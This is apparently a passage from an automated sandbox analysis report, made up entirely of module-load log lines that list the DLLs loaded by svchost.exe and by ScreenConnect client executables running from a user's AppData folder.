Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
